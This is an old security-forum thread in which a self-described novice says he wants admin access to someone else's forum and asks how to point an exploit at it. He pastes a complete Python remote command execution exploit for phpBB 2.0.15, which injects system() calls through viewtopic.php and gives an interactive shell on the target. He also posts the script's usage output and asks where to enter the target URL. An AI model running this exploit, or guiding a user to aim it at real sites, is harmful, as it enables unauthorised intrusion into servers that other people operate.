 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 66
 Members: 0
 Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Need exploit help (noob) |
|
 Posted: Fri Sep 16, 2005 9:46 pm |
 |
|
| steve348 |
| Regular user |
 |
|
| Joined: Sep 15, 2005 |
| Posts: 5 |
|
|
|
 |
|
 |
|
Okay, so ive have the exploit code, paste it into the correct program (python or perl) and that is as far as i get. Where and how do i input the information of the website that i am trying to hack (server, website, etc.)?
I am completley new to programming, and only getting into this because i really need to get admin access into a forum. Help is GREATLY appreciated. |
|
|
|
|
| Posted: Sat Sep 17, 2005 5:43 am |
|
|
| Neverhood |
| Regular user |
|
|
| Joined: Aug 29, 2005 |
| Posts: 13 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Sep 17, 2005 6:06 am |
|
|
| steve348 |
| Regular user |
|
|
| Joined: Sep 15, 2005 |
| Posts: 5 |
|
|
|
|
|
|
|
Okay, here is one example. I saved and executed, and now what? Where do i enter the details about the website i want to exploit?
#!/usr/bin/pyth0n
#
############################################################### this exploit for
# phpBB 2.0.15
print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
print " 2005 by rattle@awarenetwork.org" # rather than
print " well, just because there is none." # sending a single
# command.
import sys ####
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus
INITTAG = '<g0>'
ENDTAG = '</g0>'
def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()
if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''
url = urlunparse(url)
if url[-1] != '/': url += '/'
topic = quote_plus((sys.argv[2]))
while 1:
try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]
if (cmd == "exit"): break
else: cmd = makecmd(cmd)
out = _ex % (url,topic,cmd)
try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass
else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;
print "EXPLOIT FAILED"
except:
continue |
|
|
|
|
|
|
|
|
| Posted: Sat Sep 17, 2005 6:17 am |
|
|
| Neverhood |
| Regular user |
|
|
| Joined: Aug 29, 2005 |
| Posts: 13 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Sep 17, 2005 4:45 pm |
|
|
| steve348 |
| Regular user |
|
|
| Joined: Sep 15, 2005 |
| Posts: 5 |
|
|
|
|
|
|
|
Ok i did that, but its still not working. Isn't the code designed for Python? When i compile and execute it in python i get the following message:
phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.
Usage: C:\Documents and Settings\Steve\Desktop\exploit1.pyw <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
Traceback (most recent call last):
File "C:\Documents and Settings\Steve\Desktop\exploit1.pyw", line 43, in ?
usage()
File "C:\Documents and Settings\Steve\Desktop\exploit1.pyw", line 29, in usage
print """Usage: %s <forum> <topic>
SystemExit: 1
>>>
I have no idea what to do.  |
|
|
|
|
| Posted: Sat Sep 17, 2005 4:49 pm |
|
|
| Neverhood |
| Regular user |
|
|
| Joined: Aug 29, 2005 |
| Posts: 13 |
|
|
|
|
|
|
|
| oh i am so sorry yes this code is designed for PYTHON. |
|
|
|
|
| Posted: Sun Sep 18, 2005 3:48 pm |
|
|
| steve348 |
| Regular user |
|
|
| Joined: Sep 15, 2005 |
| Posts: 5 |
|
|
|
|
|
|
|
I've narrowed it down to this section of the code. Somewhere in that last line im guessing i type in my url, but im not sure. Can someone verify?
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1) |
|
|
|
|
| Posted: Wed Sep 21, 2005 6:49 pm |
|
|
| steve348 |
| Regular user |
|
|
| Joined: Sep 15, 2005 |
| Posts: 5 |
|
|
|
|
|
|
|
| ok so i got an exploit working for perl, but it was unsuccesful. When it says to input the topic number, is this just any random topic? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
